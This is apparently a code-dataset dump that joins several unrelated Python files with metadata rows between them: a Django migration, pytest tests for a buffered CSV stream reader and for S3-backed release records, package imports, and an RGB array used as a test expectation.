        migrations.AlterField(model_name='internetnewsperson', name='age', field=_age(13)),
        migrations.AlterField(model_name='internetnewsperson', name='family_role', field=_family_role(16)),
        migrations.AlterField(model_name='internetnewsperson', name='function', field=_function(15)),
        migrations.AlterField(model_name='internetnewsperson', name='is_photograph', field=_is_photograph(21)),
        migrations.AlterField(model_name='internetnewsperson', name='is_quoted', field=_is_quoted(20)),
        migrations.AlterField(model_name='internetnewsperson', name='occupation', field=_occupation(14)),
        migrations.AlterField(model_name='internetnewsperson', name='sex', field=_sex(12)),
        migrations.AlterField(model_name='internetnewsperson', name='victim_or_survivor', field=_victim_or_survivor(17)),
        migrations.AlterField(model_name='internetnewssheet', name='webpage_layer_no', field=models.PositiveIntegerField(blank=True, help_text='Webpage Layer Number. Homepage=1, One click away=2, Five clicks away= 5, etc. Note that if a story appears on the front page, code with 1', null=True, verbose_name='(1) Webpage Layer Number')),
        migrations.AlterField(model_name='newspaperperson', name='age', field=_age(11)),
        migrations.AlterField(model_name='newspaperperson', name='family_role', field=_family_role(14)),
        migrations.AlterField(model_name='newspaperperson', name='function', field=_function(13)),
        migrations.AlterField(model_name='newspaperperson', name='is_photograph', field=_is_photograph(19)),
        migrations.AlterField(model_name='newspaperperson', name='is_quoted', field=_is_quoted(18)),
        migrations.AlterField(model_name='newspaperperson', name='occupation', field=_occupation(12)),
        migrations.AlterField(model_name='newspaperperson', name='sex', field=_sex(10)),
        migrations.AlterField(model_name='newspaperperson', name='victim_or_survivor', field=_victim_or_survivor(15)),
        migrations.AlterField(model_name='newspapersheet', name='page_number', field=models.PositiveIntegerField(blank=True, help_text='Write in the number of the page on which the story begins. Story appears on first page = 1, Seventh page = 7, etc.', null=True, verbose_name='(1) Page Number')),
        migrations.AlterField(model_name='newspapersheet', name='space', field=models.PositiveIntegerField(blank=True, choices=[(1, '(1) Full page'), (2, '(2) Half page'), (3, '(3) One third page'), (4, '(4) Quarter page'), (5, '(5) Less than quarter page')], null=True, verbose_name='(4) Space')),
        migrations.AlterField(model_name='radioperson', name='family_role', field=_family_role(13)),
        migrations.AlterField(model_name='radioperson', name='function', field=_function(12)),
        migrations.AlterField(model_name='radioperson', name='occupation', field=_occupation(11)),
        migrations.AlterField(model_name='radioperson', name='sex', field=_sex(10)),
        migrations.AlterField(model_name='radioperson', name='victim_or_survivor', field=_victim_or_survivor(14)),
        migrations.AlterField(model_name='radiosheet', name='item_number', field=_item_number()),
        migrations.AlterField(model_name='televisionperson', name='age', field=_age(12)),
        migrations.AlterField(model_name='televisionperson', name='family_role', field=_family_role(15)),
        migrations.AlterField(model_name='televisionperson', name='function', field=_function(14)),
        migrations.AlterField(model_name='televisionperson', name='occupation', field=_occupation(13)),
        migrations.AlterField(model_name='televisionperson', name='sex', field=_sex(11)),
        migrations.AlterField(model_name='televisionperson', name='victim_or_survivor', field=_victim_or_survivor(16)),
        migrations.AlterField(model_name='televisionsheet', name='item_number', field=_item_number()),
        migrations.AlterField(model_name='twitterperson', name='age', field=_age(10)),
        migrations.AlterField(model_name='twitterperson', name='function', field=_function(12)),
        migrations.AlterField(model_name='twitterperson', name='is_photograph', field=_is_photograph(13)),
        migrations.AlterField(model_name='twitterperson', name='occupation', field=_occupation(11)),
        migrations.AlterField(model_name='twitterperson', name='sex', field=_sex(9)),
    ]
| 121.40201 | 1,758 | 0.640176 | 3,249 | 24,159 | 4.721453 | 0.0988 | 0.04824 | 0.0603 | 0.069948 | 0.96558 | 0.960365 | 0.921382 | 0.883768 | 0.875489 | 0.858475 | 0 | 0.046144 | 0.191771 | 24,159 | 198 | 1,759 | 122.015152 | 0.739476 | 0.001904 | 0 | 0.78125 | 1 | 0.098958 | 0.600929 | 0.009124 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.005208 | 0 | 0.020833 | 0.010417 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
71163ba5114de73e315124f71be5ef566aff641b | 3,548 | py | Python | tests/test_bufferedio.py | jumbrich/pyanycsv | ebffa9ac066721d107557619833c138db5e61109 | [
"MIT"
] | null | null | null | tests/test_bufferedio.py | jumbrich/pyanycsv | ebffa9ac066721d107557619833c138db5e61109 | [
"MIT"
] | null | null | null | tests/test_bufferedio.py | jumbrich/pyanycsv | ebffa9ac066721d107557619833c138db5e61109 | [
"MIT"
] | null | null | null | from anycsv.exceptions import FileSizeException
from anycsv.io_tools import BufferedAutoEncodingStream
from tests.test_encoding_detection import _create_table
def test_read_all(tmpdir):
    """Iterating the whole stream consumes every line and yields a digest."""
    data_dir = tmpdir.mkdir("tmp.csvs").mkdir("data")
    table_path = _create_table(data_dir, rows=200)

    stream = BufferedAutoEncodingStream(table_path, max_buffer=50)
    for index, _line in enumerate(stream):
        pass
    # Same expectation as before: the final zero-based index is 200.
    assert index == 200
    assert stream.digest is not None
def test_file(tmpdir):
    """reset() rewinds a file-backed stream back to the first line."""
    data_dir = tmpdir.mkdir("tmp.csvs").mkdir("data")
    table_path = _create_table(data_dir, rows=200)

    stream = BufferedAutoEncodingStream(table_path, max_buffer=50)
    before_reset = stream.readline()
    stream.reset()
    assert stream.readline() == before_reset
def test_buffer_not_reset(tmpdir):
    """reset() must raise IOError once more lines were read than the buffer holds.

    Fix: the original only asserted inside the ``except`` block, so the test
    silently passed when ``reset()`` did not raise at all.
    """
    p = tmpdir.mkdir("tmp.csvs").mkdir("data")
    csv = _create_table(p, rows=200)
    ios = BufferedAutoEncodingStream(csv, max_buffer=10)

    # Consume more lines than max_buffer so the buffer can no longer rewind.
    [next(ios) for _ in range(12)]

    try:
        ios.reset()
    except IOError:
        pass  # expected: rewind impossible past the buffer window
    else:
        raise AssertionError("reset() should raise IOError after overrunning the buffer")
def test_max_file_size(tmpdir):
    """Reading a file larger than max_file_size must raise FileSizeException.

    Fix: the original only asserted inside the ``except`` block, so the test
    silently passed when no exception was raised.
    """
    p = tmpdir.mkdir("tmp.csvs").mkdir("data")
    csv = _create_table(p, rows=200)
    ios = BufferedAutoEncodingStream(csv, max_buffer=10, max_file_size=1024)

    try:
        for _row in ios:
            pass
    except FileSizeException:
        pass  # expected: the 200-row table exceeds the 1 KiB limit
    else:
        raise AssertionError("expected FileSizeException for a file larger than max_file_size")
def test_file_gzipped(tmpdir):
    """reset() rewinds a gzip-compressed file stream back to the first line."""
    data_dir = tmpdir.mkdir("tmp.csvs").mkdir("data")
    table_path = _create_table(data_dir, rows=200, gzipped=True)

    stream = BufferedAutoEncodingStream(table_path, max_buffer=50)
    before_reset = stream.readline()
    stream.reset()
    assert stream.readline() == before_reset
def test_http(tmpdir):
    """reset() rewinds an HTTP-backed stream back to the first line.

    NOTE: downloads from a live URL, so this test needs network access.
    """
    url = "https://datascience.ai.wu.ac.at/ws1718_dataprocessing1_1823/data/allcampusrooms.csv"
    stream = BufferedAutoEncodingStream(url, max_buffer=50)
    before_reset = stream.readline()
    stream.reset()
    assert stream.readline() == before_reset
def test_buffer(tmpdir):
    """Reading exactly max_buffer lines, resetting and re-reading yields identical bytes.

    The two identical read loops of the original are folded into one local
    helper.
    """
    p = tmpdir.mkdir("tmp.csvs").mkdir("data")
    csv = _create_table(p, rows=200)
    max_buffer = 50

    def read_first_lines(stream, limit):
        # Concatenate the first `limit` lines of the stream.
        data = b''
        for count, line in enumerate(stream, start=1):
            data += line
            if count >= limit:
                break
        return data

    ios = BufferedAutoEncodingStream(csv, max_buffer=max_buffer)
    first_pass = read_first_lines(ios, max_buffer)
    ios.reset()
    second_pass = read_first_lines(ios, max_buffer)

    assert len(first_pass) == len(second_pass)
    assert first_pass == second_pass
def test_buffer_gzipped(tmpdir):
    """Buffered reset/re-read over a gzip-compressed source.

    The two identical read loops of the original are folded into one local
    helper.
    """
    p = tmpdir.mkdir("tmp.csvs").mkdir("data")
    csv = _create_table(p, rows=200, gzipped=True)
    max_buffer = 50

    def read_first_lines(stream, limit):
        # Concatenate the first `limit` lines of the stream.
        data = b''
        for count, line in enumerate(stream, start=1):
            data += line
            if count >= limit:
                break
        return data

    ios = BufferedAutoEncodingStream(csv, max_buffer=max_buffer)
    first_pass = read_first_lines(ios, max_buffer)
    ios.reset()
    second_pass = read_first_lines(ios, max_buffer)

    assert len(first_pass) == len(second_pass)
    assert first_pass == second_pass
def test_buffer_http(tmpdir):
    """Buffered reset/re-read over an HTTP source.

    Fix: renamed from ``test_buffer_gzipped`` — the original file defined that
    name twice, so this HTTP variant shadowed the real gzip test and only one
    of the two was ever collected.  NOTE: downloads from a live URL, so this
    test needs network access.
    """
    url = "https://datascience.ai.wu.ac.at/ws1718_dataprocessing1_1823/data/allcampusrooms.csv"
    max_buffer = 50

    def read_first_lines(stream, limit):
        # Concatenate the first `limit` lines of the stream.
        data = b''
        for count, line in enumerate(stream, start=1):
            data += line
            if count >= limit:
                break
        return data

    ios = BufferedAutoEncodingStream(url, max_buffer=max_buffer)
    first_pass = read_first_lines(ios, max_buffer)
    ios.reset()
    second_pass = read_first_lines(ios, max_buffer)

    assert len(first_pass) == len(second_pass)
    assert first_pass == second_pass
| 21.119048 | 95 | 0.620913 | 496 | 3,548 | 4.252016 | 0.165323 | 0.089616 | 0.056899 | 0.14936 | 0.833096 | 0.833096 | 0.833096 | 0.799905 | 0.799905 | 0.799905 | 0 | 0.029942 | 0.265784 | 3,548 | 167 | 96 | 21.245509 | 0.779655 | 0 | 0 | 0.837607 | 0 | 0 | 0.070502 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.076923 | false | 0.017094 | 0.025641 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8556fc683c4b5ed07365b7ad203a7a3216e98e36 | 17,186 | py | Python | tests/test_release.py | alexanderphoenix/catapult | e47463907aad84e2eb11ef2ea75be9beb37bb421 | [
"MIT"
] | null | null | null | tests/test_release.py | alexanderphoenix/catapult | e47463907aad84e2eb11ef2ea75be9beb37bb421 | [
"MIT"
] | null | null | null | tests/test_release.py | alexanderphoenix/catapult | e47463907aad84e2eb11ef2ea75be9beb37bb421 | [
"MIT"
] | null | null | null | import json
from datetime import datetime
from unittest import mock
import boto3
import pytz
from freezegun import freeze_time
from invoke import MockContext, Result
from moto import mock_s3
from testfixtures import compare
from catapult import release
# Mock default bucket name to stop the tests from using a real
# bucket by mistake
_PATCHER = mock.patch("catapult.utils.CONFIG", {"release": {"s3_bucket": "test"}})


def setUpModule():
    """Start the config patch (honoured by the unittest runner)."""
    _PATCHER.start()


def tearDownModule():
    """Undo the config patch applied in ``setUpModule``."""
    _PATCHER.stop()


# Fix: the tests below are plain ``test_*`` functions collected by pytest,
# which does not invoke unittest's setUpModule/tearDownModule.  Expose the
# xunit-style hooks pytest understands so the patch is active either way.
def setup_module(module=None):
    setUpModule()


def teardown_module(module=None):
    tearDownModule()
@mock_s3
@freeze_time("2018-01-01T12:00:00")
def test_get_release_from_bucket():
    """
    Gets the release from an object stored in a S3 bucket.
    """
    s3 = boto3.resource("s3")
    client = boto3.client("s3")
    s3.create_bucket(Bucket="test")
    s3.BucketVersioning("test").enable()

    stored = {
        "version": 2,
        "commit": "0123456789abcdef",
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    }
    resp = client.put_object(Bucket="test", Key="test-app", Body=json.dumps(stored))

    actual = release._get_release(client, "test", "test-app", None)

    compare(
        release.Release(
            version=stored["version"],
            commit=stored["commit"],
            changelog=stored["changelog"],
            version_id=resp["VersionId"],
            image=stored["image"],
            timestamp=datetime(2018, 1, 1, 12, 0, 0, tzinfo=pytz.utc),
            author=stored["author"],
        ),
        actual,
    )
@mock_s3
def test_get_latest_release():
    """
    Gets the latest release when the object's Version ID is not specified.

    The duplicated put_object boilerplate is folded into a local helper.
    """
    s3 = boto3.resource("s3")
    client = boto3.client("s3")
    s3.create_bucket(Bucket="test")
    s3.BucketVersioning("test").enable()

    def put_release(frozen_at, body):
        # Store a release document with the clock frozen at `frozen_at`.
        with freeze_time(frozen_at):
            return client.put_object(Bucket="test", Key="test-app", Body=json.dumps(body))

    put_release("2018-01-01T12:00:00", {
        "version": 1,
        "commit": "0123456789abcdef",
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    })
    new = put_release("2018-02-02T00:00:00", {
        "version": 2,
        "commit": "abcdef0123456789",
        "changelog": "some other changes to fix version 1",
        "image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        "author": "author@example.com",
    })

    expected = release.Release(
        version=2,
        commit="abcdef0123456789",
        changelog="some other changes to fix version 1",
        version_id=new["VersionId"],
        image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
        author="author@example.com",
    )
    compare(expected, release._get_release(client, "test", "test-app", None))
@mock_s3
def test_get_older_release():
    """
    Gets an old release using its object Version ID.

    The duplicated put_object boilerplate is folded into a local helper.
    """
    s3 = boto3.resource("s3")
    client = boto3.client("s3")
    s3.create_bucket(Bucket="test")
    s3.BucketVersioning("test").enable()

    def put_release(frozen_at, body):
        # Store a release document with the clock frozen at `frozen_at`.
        with freeze_time(frozen_at):
            return client.put_object(Bucket="test", Key="test-app", Body=json.dumps(body))

    old = put_release("2018-01-01T12:00:00", {
        "version": 1,
        "commit": "0123456789abcdef",
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    })
    put_release("2018-02-02T00:00:00", {
        "version": 2,
        "commit": "abcdef0123456789",
        "changelog": "some other changes to fix version 1",
        "image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        "author": "author@example.com",
    })

    expected = release.Release(
        version=1,
        commit="0123456789abcdef",
        changelog="some changes",
        version_id=old["VersionId"],
        image="sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        timestamp=datetime(2018, 1, 1, 12, 0, 0, tzinfo=pytz.utc),
        author="author@example.com",
    )
    compare(expected, release._get_release(client, "test", "test-app", old["VersionId"]))
@mock_s3
def test_get_releases_no_releases_yet():
    """get_releases yields nothing for an app with no stored releases."""
    s3 = boto3.resource("s3")
    client = boto3.client("s3")
    s3.create_bucket(Bucket="test")
    s3.BucketVersioning("test").enable()

    found = release.get_releases(client, "test-app", bucket="test")
    compare([], list(found))
@mock_s3
def test_get_all_releases():
    """get_releases yields every stored release, newest first.

    The duplicated put_object boilerplate is folded into a local helper.
    """
    s3 = boto3.resource("s3")
    client = boto3.client("s3")
    s3.create_bucket(Bucket="test")
    s3.BucketVersioning("test").enable()

    def put_release(frozen_at, body):
        # Store a release document with the clock frozen at `frozen_at`.
        with freeze_time(frozen_at):
            return client.put_object(Bucket="test", Key="test-app", Body=json.dumps(body))

    old = put_release("2018-01-01T12:00:00", {
        "version": 1,
        "commit": "0123456789abcdef",
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    })
    new = put_release("2018-02-02T00:00:00", {
        "version": 2,
        "commit": "abcdef0123456789",
        "changelog": "some other changes to fix version 1",
        "image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        "author": "author@example.com",
    })

    expected = [
        release.Release(
            version=2,
            commit="abcdef0123456789",
            changelog="some other changes to fix version 1",
            version_id=new["VersionId"],
            image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
            timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
            author="author@example.com",
        ),
        release.Release(
            version=1,
            commit="0123456789abcdef",
            changelog="some changes",
            version_id=old["VersionId"],
            image="sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
            timestamp=datetime(2018, 1, 1, 12, 0, 0, tzinfo=pytz.utc),
            author="author@example.com",
        ),
    ]
    compare(expected, list(release.get_releases(client, "test-app", bucket="test")))
@mock_s3
def test_get_releases_skips_non_versioned_objects():
    """Objects written before bucket versioning is enabled are ignored."""
    resource = boto3.resource("s3")
    client = boto3.client("s3")
    resource.create_bucket(Bucket="test")

    # Stored while the bucket is still unversioned, so it carries no
    # real version id and should not appear in the results.
    unversioned_payload = {
        "version": 1,
        "commit": "0123456789abcdef",
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    }
    with freeze_time("2018-01-01T12:00:00"):
        client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(unversioned_payload)
        )

    resource.BucketVersioning("test").enable()

    versioned_payload = {
        "version": 2,
        "commit": "abcdef0123456789",
        "changelog": "some other changes to fix version 1",
        "image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        "author": "author@example.com",
    }
    with freeze_time("2018-02-02T00:00:00"):
        new = client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(versioned_payload)
        )

    found = release.get_releases(client, "test-app", bucket="test")
    expected = [
        release.Release(
            version=2,
            commit="abcdef0123456789",
            changelog="some other changes to fix version 1",
            image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
            timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
            version_id=new["VersionId"],
            author="author@example.com",
        )
    ]
    compare(expected, list(found))
@mock_s3
def test_get_releases_skips_objects_with_invalid_data():
    """Objects with missing fields or unparseable JSON are skipped."""
    resource = boto3.resource("s3")
    client = boto3.client("s3")
    resource.create_bucket(Bucket="test")
    resource.BucketVersioning("test").enable()

    # A record that lacks required fields (no version/commit).
    incomplete_payload = {
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    }
    client.put_object(
        Bucket="test", Key="test-app", Body=json.dumps(incomplete_payload)
    )
    # A body that is not valid JSON at all.
    client.put_object(Bucket="test", Key="test-app", Body='{ "this": "is" invalid')

    valid_payload = {
        "version": 2,
        "commit": "abcdef0123456789",
        "changelog": "some other changes to fix version 1",
        "image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        "author": "author@example.com",
    }
    with freeze_time("2018-02-02T00:00:00"):
        new = client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(valid_payload)
        )

    found = release.get_releases(client, "test-app", bucket="test")
    expected = [
        release.Release(
            version=2,
            commit="abcdef0123456789",
            changelog="some other changes to fix version 1",
            image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
            timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
            version_id=new["VersionId"],
            author="author@example.com",
        )
    ]
    compare(expected, list(found))
@mock_s3
def test_get_releases_since():
    """Only releases newer than the `since` version are returned."""
    resource = boto3.resource("s3")
    client = boto3.client("s3")
    resource.create_bucket(Bucket="test")
    resource.BucketVersioning("test").enable()

    payload_v1 = {
        "version": 1,
        "commit": "0123456789abcdef",
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    }
    payload_v2 = {
        "version": 2,
        "commit": "abcdef0123456789",
        "changelog": "some other changes to fix version 1",
        "image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        "author": "author@example.com",
    }
    payload_v3 = {
        "version": 3,
        "commit": "zxcvbnm12345",
        "changelog": "new awesome feature",
        "image": "sha256:b0190de683bc5d190c4c09473e0d2a5696850f22244cd8e9fc925117580b6361",
        "author": "author@example.com",
    }
    with freeze_time("2018-01-01T12:00:00"):
        client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(payload_v1)
        )
    with freeze_time("2018-02-02T00:00:00"):
        second = client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(payload_v2)
        )
    with freeze_time("2018-03-03T00:00:00"):
        third = client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(payload_v3)
        )

    # since=2 excludes version 1 but keeps versions 2 and 3.
    found = release.get_releases(client, "test-app", since=2, bucket="test")
    expected = [
        release.Release(
            version=3,
            commit="zxcvbnm12345",
            changelog="new awesome feature",
            image="sha256:b0190de683bc5d190c4c09473e0d2a5696850f22244cd8e9fc925117580b6361",
            timestamp=datetime(2018, 3, 3, 0, 0, 0, tzinfo=pytz.utc),
            version_id=third["VersionId"],
            author="author@example.com",
        ),
        release.Release(
            version=2,
            commit="abcdef0123456789",
            changelog="some other changes to fix version 1",
            image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
            timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
            version_id=second["VersionId"],
            author="author@example.com",
        ),
    ]
    compare(expected, list(found))
@mock_s3
def test_get_release():
    """Looking up a release by version number returns that exact release."""
    resource = boto3.resource("s3")
    client = boto3.client("s3")
    resource.create_bucket(Bucket="test")
    resource.BucketVersioning("test").enable()

    payload_v1 = {
        "version": 1,
        "commit": "0123456789abcdef",
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    }
    payload_v2 = {
        "version": 2,
        "commit": "abcdef0123456789",
        "changelog": "some other changes to fix version 1",
        "image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        "author": "author@example.com",
    }
    with freeze_time("2018-01-01T12:00:00"):
        client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(payload_v1)
        )
    with freeze_time("2018-02-02T00:00:00"):
        second = client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(payload_v2)
        )

    found = release.get_release(client, "test-app", 2, bucket="test")
    expected = release.Release(
        version=2,
        commit="abcdef0123456789",
        changelog="some other changes to fix version 1",
        image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
        version_id=second["VersionId"],
        author="author@example.com",
    )
    compare(expected, found)
@mock_s3
def test_get_release_not_found():
    """Requesting a version that was never stored returns None."""
    resource = boto3.resource("s3")
    client = boto3.client("s3")
    resource.create_bucket(Bucket="test")
    resource.BucketVersioning("test").enable()

    payload = {
        "version": 1,
        "commit": "0123456789abcdef",
        "changelog": "some changes",
        "image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
        "author": "author@example.com",
    }
    with freeze_time("2018-01-01T12:00:00"):
        client.put_object(
            Bucket="test", Key="test-app", Body=json.dumps(payload)
        )

    # Only version 1 exists; asking for version 2 should find nothing.
    found = release.get_release(client, "test-app", 2, bucket="test")
    compare(None, found)
@mock_s3
@freeze_time("2018-01-01T12:00:00")
def test_create_new_release():
    """A release pushed via put_release can be read back with get_release."""
    resource = boto3.resource("s3")
    client = boto3.client("s3")
    resource.create_bucket(Bucket="test")
    resource.BucketVersioning("test").enable()

    # version_id/timestamp are left unset; the store assigns them on write.
    candidate = release.Release(
        version=1,
        commit="abcdef0123456789",
        changelog="some changes",
        image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
        version_id=None,
        timestamp=None,
        author="author@example.com",
    )
    pushed = release.put_release(client, "test", "test-app", candidate)
    fetched = release.get_release(client, "test-app", 1, bucket="test")
    compare(pushed, fetched)
| 30.525755 | 103 | 0.549052 | 1,538 | 17,186 | 6.049415 | 0.085176 | 0.040843 | 0.05718 | 0.066208 | 0.877365 | 0.868659 | 0.863822 | 0.853074 | 0.835447 | 0.826634 | 0 | 0.174098 | 0.329221 | 17,186 | 562 | 104 | 30.580071 | 0.632981 | 0.016409 | 0 | 0.753813 | 0 | 0 | 0.301988 | 0.119193 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028322 | false | 0 | 0.021786 | 0 | 0.050109 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8577fdc6c13168439cdd68d0ff8dcb0644d35ed6 | 126 | py | Python | api/app/games/codenames/models/__init__.py | naveen-u/lets-play | 0ea1631504fb663045d3f6f1fce7b2cff9eebe52 | [
"MIT"
] | 1 | 2020-11-29T11:33:54.000Z | 2020-11-29T11:33:54.000Z | api/app/games/codenames/models/__init__.py | naveen-u/lets-play | 0ea1631504fb663045d3f6f1fce7b2cff9eebe52 | [
"MIT"
] | null | null | null | api/app/games/codenames/models/__init__.py | naveen-u/lets-play | 0ea1631504fb663045d3f6f1fce7b2cff9eebe52 | [
"MIT"
] | null | null | null | from .codenames_players import *
from .codenames_teams import *
from .codenames_rooms import *
from .codenames_words import *
| 25.2 | 32 | 0.809524 | 16 | 126 | 6.125 | 0.4375 | 0.530612 | 0.581633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 126 | 4 | 33 | 31.5 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
859d0faf3e518eda30841d2bc73d1b26cb18928c | 356 | py | Python | tests/expectations/python-expr/apply-mask-image-exp1.py | nipeone/histolab | 78854423df04c95c7168d03a95ae8665e3e957d8 | [
"Apache-2.0"
] | 149 | 2020-06-23T17:56:04.000Z | 2022-03-26T05:51:08.000Z | tests/expectations/python-expr/apply-mask-image-exp1.py | nipeone/histolab | 78854423df04c95c7168d03a95ae8665e3e957d8 | [
"Apache-2.0"
] | 245 | 2020-06-22T22:56:06.000Z | 2022-03-28T03:18:11.000Z | tests/expectations/python-expr/apply-mask-image-exp1.py | MPBA/histolab | 1dffe88aa04022567c70bbb78f96a860d73a599b | [
"Apache-2.0"
] | 31 | 2020-06-23T17:56:36.000Z | 2022-02-07T07:41:26.000Z | [
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[73, 64, 74], [36, 44, 161], [135, 219, 69], [79, 139, 75], [148, 40, 155]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[84, 55, 130], [106, 123, 248], [117, 155, 214], [16, 121, 122], [154, 146, 26]],
]
| 44.5 | 86 | 0.342697 | 75 | 356 | 1.626667 | 0.4 | 0.704918 | 1.008197 | 1.278689 | 0.368852 | 0.368852 | 0.368852 | 0.368852 | 0.368852 | 0.368852 | 0 | 0.471042 | 0.272472 | 356 | 7 | 87 | 50.857143 | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
85c040c05aa9470da3143a5e168b9f5d17c00caa | 157 | py | Python | lib/nn/modules/__init__.py | switchablenorms/SwitchNorm_Detection | ab6848667bc8976367fdacb4b8ebbaeefdc79bd6 | [
"MIT"
] | 90 | 2018-07-26T06:41:23.000Z | 2021-11-08T10:40:51.000Z | lib/nn/modules/__init__.py | switchablenorms/SwitchNorm_Detection | ab6848667bc8976367fdacb4b8ebbaeefdc79bd6 | [
"MIT"
] | null | null | null | lib/nn/modules/__init__.py | switchablenorms/SwitchNorm_Detection | ab6848667bc8976367fdacb4b8ebbaeefdc79bd6 | [
"MIT"
] | 16 | 2018-07-26T09:59:36.000Z | 2020-10-08T07:21:58.000Z | from .affine import AffineChannel2d
from .normalization import GroupNorm
from .normalization import SwitchNorm
from .upsample import BilinearInterpolation2d
